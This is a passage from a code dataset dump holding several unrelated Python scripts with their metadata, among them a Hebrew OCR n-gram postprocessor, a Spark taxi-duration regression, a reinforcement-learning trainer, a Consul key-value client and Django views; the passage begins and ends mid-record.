\"output\"\nCHAR_PROB_THRESHOLD = 0.6\n\nfn = join(abspath('..'), 'ngrams.npz')\nchar_map = {'Alef' : 0, \n 'Ayin' : 1, \n 'Bet' : 2, \n 'Dalet' : 3, \n 'Gimel' : 4, \n 'He' : 5, \n 'Het' : 6, \n 'Kaf' : 7, \n 'Kaf-final' : 8, \n 'Lamed' : 9, \n 'Mem' : 10, \n 'Mem-medial' : 11, \n 'Nun-final' : 12, \n 'Nun-medial' : 13, \n 'Pe' : 14, \n 'Pe-final' : 15, \n 'Qof' : 16, \n 'Resh' : 17, \n 'Samekh' : 18, \n 'Shin' : 19, \n 'Taw' : 20, \n 'Tet' : 21, \n 'Tsadi-final' : 22, \n 'Tasdi-final' : 22, # catch typo in dataset\n 'Tsadi-medial' : 23, \n 'Tsadi' : 23, # catch typo in dataset\n 'Waw' : 24, \n 'Yod' : 25, \n 'Zayin' : 26\n }\n\nhebrew_map = {\n 0: u'\\u05D0',\n 1: u'\\u05E2',\n 2: u'\\u05D1',\n 3: u'\\u05D3',\n 4: u'\\u05D2',\n 5: u'\\u05D4',\n 6: u'\\u05D7',\n 7: u'\\u05DB',\n 8: u'\\u05DA',\n 9: u'\\u05DC',\n 10: u'\\u05DD',\n 11: u'\\u05DE',\n 12: u'\\u05DF',\n 13: u'\\u05E0',\n 14: u'\\u05E4',\n 15: u'\\u05E3',\n 16: u'\\u05E7',\n 17: u'\\u05E8',\n 18: u'\\u05E1',\n 19: u'\\u05E9',\n 20: u'\\u05EA',\n 21: u'\\u05D8',\n 22: u'\\u05E5',\n 23: u'\\u05E6',\n 24: u'\\u05D5',\n 25: u'\\u05D9',\n 26: u'\\u05D6'\n }\n\n## needed for the final program, as YOLO now returns hebrew\nrev_hebrew_map = {}\nfor key, val in hebrew_map.items(): \n rev_hebrew_map[val] = key\n\n\nclass Bayesian_processor():\n \"\"\"docstring for Bayesian_processor\"\"\"\n def __init__(self):\n self.ngrams = np.load(fn)\n self.unigrams = self.ngrams['unigrams']\n self.bigrams = self.ngrams['bigrams']\n self.trigrams = self.ngrams['trigrams']\n\n ## parameters for simple interpolation\n self.TRIGRAM_IMPORTANCE = 0.33\n self.BIGRAM_IMPORTANCE = 0.33\n self.UNIGRAM_IMPORTANCE = 1.0 - self.TRIGRAM_IMPORTANCE - self.BIGRAM_IMPORTANCE\n self.MINIMAL_SAME_CHAR_SEQ_LEN = 3\n\n def process_word(self, predicted_word):\n \"\"\"\n P( z | xy) = lambda * P(xyz) / P(xy) + mu * P(yz) / P(y) + (1.0 - lambda - mu) * P(z) / P(sum unigrams) \n \"\"\"\n posterior_word = np.zeros((len(predicted_word), len(self.unigrams)), dtype=np.double)\n\n ## forward pass\n for idx, prior_softmax in enumerate(predicted_word):\n if idx > 1: ## use trigrams\n first_softmax = predicted_word[idx-2]\n second_softmax = predicted_word[idx-1]\n nr_classes = len(self.unigrams)\n\n\n for third_letter in range(nr_classes):\n letter_probs = []\n for second_letter in range(nr_classes):\n for first_letter in range(nr_classes):\n trigram_divisor = self.bigrams[first_letter, second_letter] ## bigram-prob used for division\n\n trigram_prob = self.trigrams[first_letter, second_letter, third_letter] / trigram_divisor\n bigram_prob = self.bigrams[second_letter, third_letter] / self.unigrams[second_letter]\n unigram_prob = self.unigrams[third_letter] / np.sum(self.unigrams)\n\n prob = trigram_prob * self.TRIGRAM_IMPORTANCE + bigram_prob * self.BIGRAM_IMPORTANCE +\\\n unigram_prob * self.UNIGRAM_IMPORTANCE\n\n # take priors of all letters into account\n prob *= prior_softmax[third_letter] * second_softmax[second_letter] * first_softmax[first_letter]\n\n letter_probs.append(prob)\n posterior_word[idx, third_letter] += max(letter_probs)\n\n ## backward pass\n for idx in range(len(predicted_word) - 3, -1, -1):\n prior_softmax = predicted_word[idx]\n third_softmax = predicted_word[idx+2]\n second_softmax = predicted_word[idx+1]\n nr_classes = len(self.unigrams)\n\n\n for first_letter in range(nr_classes):\n letter_probs = []\n for second_letter in range(nr_classes):\n for third_letter in range(nr_classes):\n trigram_divisor = self.bigrams[second_letter, third_letter] ## bigram-prob used for division\n\n trigram_prob = self.trigrams[first_letter, second_letter, third_letter] / trigram_divisor\n bigram_prob = self.bigrams[first_letter, second_letter] / self.unigrams[second_letter]\n unigram_prob = self.unigrams[first_letter] / np.sum(self.unigrams)\n\n prob = trigram_prob * self.TRIGRAM_IMPORTANCE + bigram_prob * self.BIGRAM_IMPORTANCE +\\\n unigram_prob * self.UNIGRAM_IMPORTANCE\n\n prob *= prior_softmax[first_letter] * second_softmax[second_letter] * third_softmax[third_letter]\n\n letter_probs.append(prob)\n posterior_word[idx, first_letter] += max(letter_probs)\n return posterior_word\n\n def normalize_posteriors(self, word):\n \"\"\"Normalize probabilites per letter\n (e.g., [0.1, 0.2, 0.1] to [0.25, 0.5, 0.25])\n \"\"\"\n return [[p / sum(posteriors) for p in posteriors]\n for posteriors in word]\n\n def print_word(self, word, title=None):\n if title is not None:\n print(f\"{title}:\")\n\n # Word as string\n print(''.join([hebrew_map[letter.index(max(letter))] for letter in word]))\n\n # Word as separate probabilities\n [print(f\"{hebrew_map[letter.index(max(letter))]}\\t(p = {max(letter):.2f})\") for letter in word]\n print()\n\n def append_word_to_file(self, word, file):\n # TBA\n wordstring = ''.join([hebrew_map[letter.index(max(letter))]\n for letter in word])\n\n def probs_to_one_hot(self, arr):\n arr_len = len(arr)\n arr = np.array(arr)\n new = np.zeros(arr_len, dtype = int)\n new[np.argmax(arr)] = 1\n new = new.tolist()\n return new\n\n # This function will produce output such that each character in a same character sequence only occurs once. \n # This function takes the mean of the same char sequence\n def filter_on_seq_of_same_chars_2(self, probabilities):\n first_char_flag = False # Flag to determine first char of same char sequence\n one_hots = []\n trash_indices = []\n out_probs = []\n #convert softmax arrays to one hot arrays\n for arr in probabilities:\n one_hot = self.probs_to_one_hot(arr)\n one_hots.append(one_hot)\n first_char_mean = probabilities[0]\n for idx in range(0, len(one_hots)):\n try:\n if one_hots[idx] == one_hots[idx+1]: #Next char is the same as current one\n trash_indices.append(idx+1)\n first_char_flag = True\n else:\n first_char_flag = False\n first_char_mean = probabilities[idx]\n\n if first_char_flag:\n first_char_mean = [statistics.mean(k) for k in zip(first_char_mean,probabilities[idx+1])] # Compute mean of first char of same char seq. and the char ahead\n else:\n out_probs.append(first_char_mean) \n except:\n pass\n return out_probs\n\n # This function will produce output such that each character in a same character sequence only occurs once. \n def filter_on_seq_of_same_chars(self, probabilities):\n one_hots = []\n trash_indices = []\n #convert softmax arrays to one hot arrays\n for arr in probabilities:\n one_hot = self.probs_to_one_hot(arr)\n one_hots.append(one_hot)\n for idx in range(0, len(one_hots)):\n try:\n if one_hots[idx] == one_hots[idx+1]:\n trash_indices.append(idx+1)\n except:\n pass\n probabilities = [j for i, j in enumerate(probabilities) if i not in trash_indices]\n return probabilities\n\n # This function filters the character sequence on single occuring characters in a sequence.\n # These characters are regarded as noise. E.g. in the ence AAABAACCCCCC, B would be regarded as noise\n # The function also downscales the char array such that only same char sequences with length >= self.MINIMAL_SAME_CHAR_SEQ_LEN\n # are kept. \n def sequence_denoiser(self, probabilities):\n one_hots = []\n trash_indices = []\n #convert softmax arrays to one hot arrays\n for arr in probabilities:\n one_hot = self.probs_to_one_hot(arr)\n one_hots.append(one_hot)\n for idx in range(0, len(one_hots)):\n try:\n for kernel_idx in range(1, self.MINIMAL_SAME_CHAR_SEQ_LEN):\n if not (one_hots[idx] == one_hots[idx+kernel_idx+1]):\n trash_indices.append(idx+kernel_idx+1)\n except:\n pass\n probabilities = [j for i, j in enumerate(probabilities) if i not in trash_indices]\n return probabilities\n\n def apply_threshold(self, probabilities):\n new_probs = []\n for softmax in probabilities:\n if softmax[np.array(softmax).argmax()] > CHAR_PROB_THRESHOLD:\n new_probs.append(softmax)\n return new_probs\n\n def apply_postprocessing(self, probabilities):\n probabilities = self.sequence_denoiser(probabilities)\n probabilities = self.filter_on_seq_of_same_chars(probabilities)\n probabilities = self.apply_threshold(probabilities)\n probabilities.reverse() # This way the n-grams will be applied from right to left\n posteriors = self.process_word(probabilities)\n posteriors = self.normalize_posteriors(posteriors)\n posteriors = self.filter_on_seq_of_same_chars(posteriors) # Filter on same-char-sequences, these may be produced by the n-grams post processing\n posteriors.reverse() # This way the n-grams will be applied from right to left\n final_sentence = \"\"\n for idx, letter_probs in enumerate(posteriors):\n best_letter_val = max(letter_probs)\n best_letter_index = letter_probs.index(best_letter_val)\n final_sentence += hebrew_map[best_letter_index]\n return final_sentence\n\n\nif __name__ == \"__main__\":\n # When running this script standalone, use this example:\n\n # Construct mock prediction softmax (of length (n x 27) )\n processor = Bayesian_processor()\n sw = SlidingWindow()\n image_file = \"../data/backup_val_lines/line1.png\"\n sw.load_image(image_file)\n\n predicted_sentence = sw.get_letters()\n sentence = processor.apply_postprocessing(predicted_sentence)\n","sub_path":"src/bayesian_postp.py","file_name":"bayesian_postp.py","file_ext":"py","file_size_in_byte":11724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"518198165","text":"import numpy as np\nfrom importlib import import_module\nimport signal\nimport time\nfrom termcolor import colored\nimport h5py\n\ngame = import_module(\"game\")\nai = import_module(\"ai\")\nann = import_module(\"ann\")\n\ntic_ann = ann.TicNN()\n\ntrain_input_data = []\ntrain_output_prob = []\ntrain_adv = []\n\ngame_data_count = 0\n\ngame_losses = 0\ngame_draws = 0\n\ndef cb(board_arr, player_id):\n\n\tglobal train_input_data, game_data_count\n\n\tif player_id == 1:\n\n\t\treturn ai.ticplay(board_arr, player_id)\n\n\tcell_index = tic_ann.ticplay(board_arr, player_id)\n\n\tmove = np.transpose(np.unravel_index(cell_index, (3,3)))[0]\n\n\tflat_board = np.copy(board_arr).flatten()\n\n\ttrain_input_data.append(flat_board)\n\n\toutput_prob = np.zeros((1,9))\n\toutput_prob[0,cell_index] = 1.0\n\n\ttrain_output_prob.append(output_prob.flatten())\n\n\tgame_data_count += 1\n\n\treturn move\n\ninterrupted = {'value':False}\n\ndef signal_handler(signal, frame):\n\tinterrupted['value'] = True\n\ttic_ann.stop_train()\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n\nMAX_GAMES = 2\n\ngame_count = 0\n\nwhile game_count < MAX_GAMES and not interrupted['value']:\n\n\tprint()\n\tprint(colored(\"Started game: {}\".format(game_count+1), 'blue'))\n\n\ttic_game = game.TicGame(cb)\n\ttic_game.set_render(True)\n\tgame_result = tic_game.start()\n\n\tscore = 1\n\n\tif game_result == 1:\n\t\t\n\t\tgame_losses += 1\n\t\tscore = -1\n\n\telif game_result == 9:\n\t\tgame_draws += 1\n\n\tgame_adv = np.full((game_data_count,), score)\n\ttrain_adv.append(game_adv.flatten())\n\n\tgame_data_count = 0\n\n\tgame_count += 1\n\nprint()\nprint(colored(\"{} Game loss\".format(game_losses), 'red'))\nprint(colored(\"{} Game draw\".format(game_draws), 'green'))\nprint()\n\nprint(\"Saving data...\")\n\ntrain_input_data = np.array(train_input_data)\ntrain_output_prob = np.array(train_output_prob)\ntrain_adv = np.hstack(np.array(train_adv))\ntrain_adv = np.expand_dims(train_adv, 1)\n\n\ndef append_dataset(dset, data):\n\t\n\tfirst_index = dset.shape[0]\n\n\tdset.resize((dset.shape[0] + data.shape[0], dset.shape[1]))\n\tdset[first_index:,:] = data\n\n\nf = h5py.File(\"train_data.hdf5\")\n\nif \"train_data\" in f:\n\n\tgrp = f[\"train_data\"]\n\t\n\tinput_dset = grp[\"input\"]\n\toutput_prob_dset = grp[\"output_prob\"]\n\ttrain_adv_dset = grp[\"output_adv\"]\n\n\tappend_dataset(input_dset, train_input_data)\n\tappend_dataset(output_prob_dset, train_output_prob)\n\tappend_dataset(train_adv_dset, train_adv)\n\n\nelse:\n\n\tgrp = f.create_group(\"train_data\")\n\n\tinput_dset = grp.create_dataset(\"input\", train_input_data.shape, maxshape=(None, None))\n\tinput_dset[...] = train_input_data\n\n\toutput_prob_dset = grp.create_dataset(\"output_prob\", train_output_prob.shape, maxshape=(None, None))\n\toutput_prob_dset[...] = train_output_prob\n\n\ttrain_adv_dset = grp.create_dataset(\"output_adv\", train_adv.shape, maxshape=(None, None))\n\ttrain_adv_dset[...] = train_adv\n\nf.close()\n\nprint(\"Data saved!\")\nprint()\n\nprint(\"Saving ANN...\")\n\ntic_ann.save(\"tic.net\")\n\nprint(\"ANN saved!\")\n","sub_path":"generate_train_ann.py","file_name":"generate_train_ann.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"362116585","text":"import sys\nfrom PyQt5.QtWidgets import (QApplication, QWidget, QGridLayout, QLabel, QLineEdit, QTextEdit, QPushButton)\n\n\nclass MyApp(QWidget):\n\n def __init__(self):\n super().__init__()\n self.initUI()\n def initUI(self):\n num1 = QPushButton('1')\n num2 = QPushButton('2')\n num3 = QPushButton('3')\n num4 = QPushButton('4')\n num5 = QPushButton('5')\n num6 = QPushButton('6')\n num7 = QPushButton('7')\n num8 = QPushButton('8')\n num9 = QPushButton('9')\n \n num0 = QPushButton('0')\n del_btn=QPushButton('del')\n plus_btn=QPushButton('+')\n minus_btn=QPushButton('-')\n\n grid = QGridLayout()\n self.setLayout(grid)\n# grid.addWidget(QLabel('Title:'), 0, 0)\n# grid.addWidget(QLabel('Author:'), 1, 0)\n# grid.addWidget(QLabel('Review:'), 2, 0)\n grid.addWidget(num7, 0, 0)\n grid.addWidget(QLineEdit(), 1, 1)\n grid.addWidget(QTextEdit(), 2, 1)\n self.setWindowTitle('QGridLayout')\n self.setGeometry(300, 300, 300, 200)\n self.show()\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = MyApp()\n sys.exit(app.exec_())\n","sub_path":"ca.py","file_name":"ca.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"180562158","text":"import sys\nassert sys.version_info >= (3, 5) # make sure we have Python 3.5+\nfrom pyspark.sql import SparkSession, SQLContext, functions, types\nfrom pyspark.sql import SQLContext, functions\nfrom pyspark.ml.regression import LinearRegression\nfrom pyspark.ml.evaluation import RegressionEvaluator\nfrom pyspark.ml.feature import VectorAssembler\nfrom pyspark.ml.feature import StandardScaler\nfrom pyspark.ml import Pipeline\nfrom pyspark.sql.functions import *\nspark = SparkSession.builder.appName('new stations').getOrCreate()\nassert spark.version >= '2.4' # make sure we have Spark 2.4+\nspark.sparkContext.setLogLevel('WARN')\nspark.conf.set(\"spark.sql.debug.maxToStringFields\", 1000)\nsc = spark.sparkContext\nsqlContext = SQLContext(sc)\n\n\ntaxi_data = spark.read.csv(r\"taxi_traffic.csv\", inferSchema=True, header=True)\n\ndf = taxi_data.filter(taxi_data['trip_distance'] < 20.0)\ndf = df.na.drop()\n\ndf = df.withColumn(\"pickup_datetime\", from_unixtime(unix_timestamp(df.pickup_datetime, \"yyyy-MM-dd HH:mm:ss\")))\ndf = df.withColumn(\"pickup_hour\", hour(df.pickup_datetime))\ndf = df.withColumn(\"pickup_month\", month(df.pickup_datetime))\n\ntime_diff = (functions.unix_timestamp('dropoff_datetime', \"yyyy-MM-dd HH:mm:ss\") -\n functions.unix_timestamp('pickup_datetime', \"yyyy-MM-dd HH:mm:ss\"))/60\n\ndf = df.withColumn(\"duration_min\", time_diff)\ndf = df.withColumn(\"speed_mph\", df.trip_distance / (df.duration_min / 60))\n\n\nfeatures = ['passenger_count', 'trip_distance', 'rate_code', 'payment_type',\n 'fare_amount', 'extra', 'mta_tax', 'tip_amount', 'total_amount', 'travel_time',\n 'tolls_amount', 'imp_surcharge', 'velocity', 'pickup_hour', 'pickup_month', 'speed_mph']\n\n# change duration min to label\ndata = df.select(df.duration_min.alias(\"label\"), *features)\ndata = data.dropna()\n\n# split train and validation data\ntrain, validation = data.randomSplit([0.75, 0.25])\ntrain = train.cache()\nvalidation = validation.cache()\n\n# create a pipeline\nassembler = VectorAssembler(inputCols=features, outputCol=\"unscaled_features\")\nscaler = StandardScaler(inputCol=\"unscaled_features\", outputCol=\"features\", withStd=True, withMean=False)\nlr = LinearRegression(maxIter=10, regParam=0.3, elasticNetParam=0.8)\n\npipeline = Pipeline(stages=[assembler, scaler, lr])\n\nmodel = pipeline.fit(train)\n\n# create an evaluator and score the test data\nevaluator = RegressionEvaluator(predictionCol=\"prediction\", labelCol=\"label\", metricName=\"rmse\")\n\nprediction = model.transform(validation)\n\n# Root Mean Square Error\nrmse = evaluator.evaluate(prediction)\nprint(\"RMSE: %.3f\" % rmse)\n# RMSE: 3.689\n","sub_path":"spark/taxi_ml_prediction.py","file_name":"taxi_ml_prediction.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"248887897","text":"import shutil\n\nimport numpy as np\nfrom gym import Env\n\nfrom rltg.agents.RLAgent import RLAgent\nfrom rltg.agents.TGAgent import TGAgent\nfrom rltg.utils.Renderer import PixelRenderer, Renderer\nfrom rltg.utils.StatsManager import StatsManager\n\nimport os\n\ndef goal_perc_threshold(*args, **kwargs)->bool:\n goal_history = kwargs[\"goal_history\"]\n window_size = kwargs[\"window_size\"]\n if len(goal_history)= 97.00\n\ndef check_automata_in_final_state(*args, **kwargs)->bool:\n temporal_evaluators = kwargs[\"temporal_evaluators\"]\n # all the automata has to be in their final state\n return all(t.simulator.is_true() for t in temporal_evaluators)\n\n\n\nID2ACTION = {0: 2, 1: 3}\nclass Trainer(object):\n def __init__(self, env:Env, agent:RLAgent, n_episodes=1000,\n eval=False,\n resume=False,\n renderer:Renderer=None,\n window_size=100,\n stopping_conditions=(goal_perc_threshold, check_automata_in_final_state),\n agent_data_dir=\"agent_data\"):\n self.env = env\n self.agent = agent\n self.stopping_conditions = stopping_conditions\n self.n_episodes = n_episodes\n self.resume = resume\n self.eval = eval\n self.renderer = renderer\n self.window_size = window_size\n\n if not self.resume:\n shutil.rmtree(agent_data_dir, ignore_errors=True)\n os.mkdir(agent_data_dir)\n\n self.agent_data_dir = agent_data_dir\n\n if self.eval:\n self.agent.set_eval(self.eval)\n\n def main(self):\n agent = self.agent\n\n num_episodes = self.n_episodes\n last_goal = False\n stats = StatsManager(self.window_size)\n\n if self.resume:\n agent.load(self.agent_data_dir)\n\n # Main training loop\n for ep in range(num_episodes):\n\n # switch between training mode and evaluation mode\n # to check if policy reached is optimal.\n # only when in training mode\n steps, total_reward, goal = self.train_loop(try_optimal=self.eval or last_goal)\n last_goal = goal\n\n stats.update(len(agent.brain.Q), total_reward, goal)\n stats.print_summary(ep, steps, len(agent.brain.Q), total_reward, agent.exploration_policy.epsilon, goal)\n\n # stopping conditions\n if self.check_stop_conditions(agent, stats):\n break\n\n agent.reset()\n if not self.eval and ep % 100 == 0:\n agent.save(self.agent_data_dir)\n\n agent.save(self.agent_data_dir)\n stats.plot()\n\n\n def train_loop(self, try_optimal=False):\n env = self.env\n agent = self.agent\n total_reward = 0\n steps = 0\n\n state = env.reset()\n temporal_evaluators = agent.temporal_evaluators if isinstance(agent, TGAgent) else []\n\n done = False\n info = {\"goal\": False}\n\n # until the game is not ended and every temporal task is not failed\n while not done and all(not t.is_failed() for t in temporal_evaluators):\n action = agent.act(state, best_action=try_optimal)\n state2, reward, done, info = env.step(action)\n agent.observe(state, action, reward, state2)\n agent.replay()\n\n # add the observed reward (including the automaton reward)\n total_reward += agent.brain.obs_history[-1][2]\n steps += 1\n\n agent.update()\n state = state2\n\n if self.renderer:\n self.renderer.update(env)\n\n return steps, total_reward, info[\"goal\"]\n\n def check_stop_conditions(self, agent, stats):\n temporal_evaluators = agent.temporal_evaluators if isinstance(agent, TGAgent) else []\n if not self.eval and all([s(goal_history=stats.goals, temporal_evaluators=temporal_evaluators, window_size=self.window_size)\n for s in self.stopping_conditions]):\n return True\n\n return False\n","sub_path":"rltg/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"102131377","text":"from PIL import Image\nfrom torchvision import models, transforms\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\nimport torch\nimport numpy as np\nimport cv2\nimport os\nimport argparse\nimport pickle\n\nCAM_DIR = '/data/vision/oliva/scratch/monica/CAM'\nFRAME_DIR ='/data/vision/oliva/scratch/monica/prediction_30fps'\n\nnum_classes = 2\nalpha = 0.75\n\n\nfeatures_blobs = []\ndef load_model(model_path):\n print ('loading net')\n net = torch.load(model_path)\n feature_names = [\"layer4\", \"avgpool\"]\n print ('setting net to eval')\n net.eval()\n def hook_feature(module, input, output):\n features_blobs.append(output.data.cpu().numpy())\n print ('registering forward hook')\n model = net._modules['model']\n for name in feature_names:\n model._modules.get(name).register_forward_hook(hook_feature)\n #print ('features blobs', features_blobs)\n return model\n\ndef returnCAM(feature_conv, weight_softmax, class_idx):\n # generate the class activation maps upsample to 256x256\n print ('returning CAM')\n size_upsample = (256, 256)\n bz, nc, h, w = feature_conv.shape\n output_cam = []\n for idx in class_idx:\n cam = weight_softmax[idx].dot(feature_conv.reshape((nc, h*w)))\n cam = cam.reshape(h, w)\n cam = cam - np.min(cam)\n cam_img = cam / np.max(cam)\n cam_img = np.uint8(255 * cam_img)\n output_cam.append(cv2.resize(cam_img, size_upsample))\n return output_cam\n\ndef extract_frames(video_name):\n print ('extracting frames')\n with open(os.path.join(CAM_DIR,'test_jan13_2_dict.p'), 'rb') as f:\n data = pickle.load(f)\n frames = data[video_name]\n frame_paths = [os.path.join(FRAME_DIR, video_name, f) for f in frames]\n images = [Image.open(frame).convert('RGB') for frame in frame_paths]\n return images\n\nnormalize = transforms.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]\n)\npreprocess = transforms.Compose([\n transforms.Resize((224,224)),\n transforms.ToTensor(),\n normalize\n])\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"test CAM on a set of videos\")\n parser.add_argument('--video_name', type=str, default=None)\n args = parser.parse_args()\n \n frames = extract_frames(args.video_name)\n OUTPUT_DIR = os.path.join(CAM_DIR, args.video_name)\n if not os.path.exists(OUTPUT_DIR):\n os.mkdir(OUTPUT_DIR)\n model = load_model(\"incident_model.pth\")\n \n params = list(model.parameters())\n weight_softmax = np.squeeze(params[-2].data.cpu().numpy())\n weight_softmax[weight_softmax<0] = 0\n buffer = torch.FloatTensor(num_classes, 5).fill_(0)\n cam_buffer = torch.FloatTensor(5, 256, 256).fill_(0)\n\n for i in range(len(frames)):\n features_blobs = []\n print (\"processing image\")\n img_tensor = preprocess(frames[i])\n img_variable = Variable(img_tensor.unsqueeze(0).cuda(), volatile=True)\n print (\"running the image\")\n logit = model(img_variable)\n probs = F.softmax(logit).data.squeeze()\n frames[i] = np.array(frames[i])\n height, width, _ = frames[i].shape\n buffer[:,i%5] = probs\n probs = buffer.mean(1)\n #print (features_blobs)\n cam_buffer[i%5] = torch.FloatTensor(returnCAM(features_blobs[0], weight_softmax, [1])[0])\n CAM = cam_buffer.mean(0)\n CAM.add_(-CAM.min()).div_(CAM.max()).mul_(255)\n CAMs = np.uint8(CAM)\n heatmap = cv2.applyColorMap(cv2.resize(CAMs, (width, height)), cv2.COLORMAP_JET)\n frames[i] = frames[i]*0.6 + heatmap*0.4\n overlay = frames[i].copy()\n\n if probs[1] > 0.5:\n cv2.putText(overlay,\"incident\", (1, int(height/8)), cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 255, 255), 2)\n cv2.addWeighted(overlay, alpha, frames[i], 1 - alpha, 0, frames[i])\n # frames[i] = np.flip(frames[i], 2)\n output_jpg = os.path.join(OUTPUT_DIR, \"%03d.jpg\" % i)\n print (\"writing\", output_jpg)\n cv2.imwrite(output_jpg, frames[i])\n","sub_path":"CAM/resnet_CAM.py","file_name":"resnet_CAM.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"449776080","text":"import requests\nimport traceback\nimport os\n\nclass ConsulClient:\n def __init__(self, address):\n self.address = address\n\n def put_kv(self, key, value):\n data = value\n try:\n response = requests.put(f'{self.address}/v1/kv/{key}', data=data)\n if str(response.text) == 'true':\n print(f'posted value: {data}, for key: {key}')\n else:\n print(f'could not post value: {data}, for key: {key}')\n \n except:\n traceback.print_exc()\n os._exit(-1)\n \n def get_kv(self, key):\n try:\n response = requests.get(f'{self.address}/v1/kv/{key}')\n print(f'{response.text}')\n except:\n traceback.print_exc()\n os._exit(-1)\n \n def delete_kv(self, key):\n try:\n response = requests.delete(f'{self.address}/v1/kv/{key}')\n print(f'{response.text}')\n except:\n traceback.print_exc()\n os._exit(-1)\n\nif __name__ == \"__main__\":\n c = ConsulClient('http://127.0.0.1:8500/')\n c.put_kv('abc/def/ghi', 'aeiou')\n c.get_kv('abc/def/ghi')\n","sub_path":"consul/python_client.py","file_name":"python_client.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"624470898","text":"from django.shortcuts import get_object_or_404, render\n\nfrom . import models\nfrom taggit.models import Tag\n\nfrom blog.views import SidebarView\n\ndef post_list(request):\n \"\"\"\n List of all posts\n \"\"\"\n\n # get all the posts\n posts = models.Post.objects.order_by('-created_at')\n\n # get all of the months that have posts\n # empty months dict\n months = {}\n # for each post in posts\n for post in posts:\n # isolate the month\n post_month = post.created_at.strftime(\"%B\")\n # if the month doesn't exist in months yet\n if post_month not in months:\n # add the month to months\n months[post_month] = 1\n else:\n # increment the existing month by 1\n months[post_month] += 1\n\n # get all of the categories\n categories = models.Category.objects.order_by('name')\n\n # get all of the tags\n tags = Tag.objects.order_by('name')\n\n return render(request, 'app_blog/post_list.html', {'posts': posts, 'months': months, 'categories': categories, 'tags': tags})\n\ndef post_detail(request, slug):\n \"\"\"\n Individual post\n \"\"\"\n\n # get a single post\n post = get_object_or_404(models.Post, slug=slug)\n\n return render(request, 'app_blog/post_detail.html', {'post': post})\n","sub_path":"app_blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"559961990","text":"##############################################################################\n# Parte do livro Introdução à Programação com Python\n# Autor: Nilo Ney Coutinho Menezes\n# Editora Novatec (c) 2010-2020\n# Primeira edição - Novembro/2010 - ISBN 978-85-7522-250-8\n# Segunda edição - Junho/2014 - ISBN 978-85-7522-408-3\n# Terceira Edição - Janeiro/2019 - ISBN 978-85-7522-718-3\n#\n# Site: https://python.nilo.pro.br/\n#\n# Arquivo: exercicios3\\capitulo 09\\exercicio-09-10.py\n##############################################################################\n\nimport sys\n\nif len(sys.argv) < 2:\n print(\"\\nUso: e09-10.py arquivo1 [arquivo2 arquivo3 arquivoN]\\n\\n\\n\")\n sys.exit(1)\n\nsaída = open(\"saida_unica.txt\", \"w\", encoding=\"utf-8\")\nfor nome in sys.argv[1:]:\n arquivo = open(nome, \"r\", encoding=\"utf-8\")\n for linha in arquivo:\n saída.write(linha)\n arquivo.close()\nsaída.close()\n","sub_path":"exercicios_resolvidos3/exercicios3/capitulo 09/exercicio-09-10.py","file_name":"exercicio-09-10.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"425877362","text":"from django.shortcuts import render, redirect, HttpResponseRedirect\nfrom user_profile.models import UserProfile\nfrom task.models import Task, TaskForm, TaskAnswers\n\n\ndef create(request):\n return render(request, 'create_task.html', {'task_form': TaskForm, 'user_profile': UserProfile.objects.get_user_profile(request.user)})\n\n\ndef save(request):\n if request.method == 'POST':\n task = TaskForm(request.POST)\n if task.is_valid():\n new_task = task.save(commit=False)\n new_task.author = request.user\n new_task.save()\n # task = request.POST\n # name = task.name\n # topic = task.topic\n # level = task.level\n # content = task.content\n # author = request.user\n # Task.object.create_task(name, author, level, topic, content)\n return HttpResponseRedirect('/profile/')\n\n\ndef show(request):\n task_id = request.GET['id']\n user_profile = UserProfile.objects.get_user_profile(request.user)\n task = Task.objects.get(name=task_id)\n try:\n TaskAnswers.objects.get(task=task, user=request.user)\n is_solved = 'true'\n except TaskAnswers.DoesNotExist:\n is_solved = 'false'\n # task_answers = TaskAnswers.objects.get(task=task, user=request.user)\n\n # if task_answers:\n # is_solved = 'true'\n # for task_answer in task_answers:\n # if task_answer.user == request.user:\n # is_solved = 'true'\n return render(request, 'show_task.html', {'task': task, 'is_solved': is_solved, 'user_profile': user_profile})\n\n\ndef get_answer(request):\n task_id = request.GET['id']\n answer = request.POST['answer']\n task = Task.objects.get(name=task_id)\n user_profile = UserProfile.objects.get_user_profile(request.user)\n if answer == task.answer:\n try:\n TaskAnswers.objects.get(task=task, user=request.user)\n except TaskAnswers.DoesNotExist:\n task_answer = TaskAnswers()\n task_answer.task = task\n task_answer.user = request.user\n task_answer.save()\n rating = 0\n if task.level == 'easy':\n rating = 100\n elif task.level == 'medium':\n rating = 200\n else:\n rating = 300\n user_profile.rating += rating\n user_profile.save()\n return render(request, \"answer_handler.html\", {'answer': 'right', 'user_profile': user_profile})\n return render(request, 'answer_handler.html', {'task': task, 'answer': 'wrong', 'user_profile': user_profile})","sub_path":"TASKER/task/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"166500349","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sys\n\narg1 = sys.argv[1] # input array\narg2 = 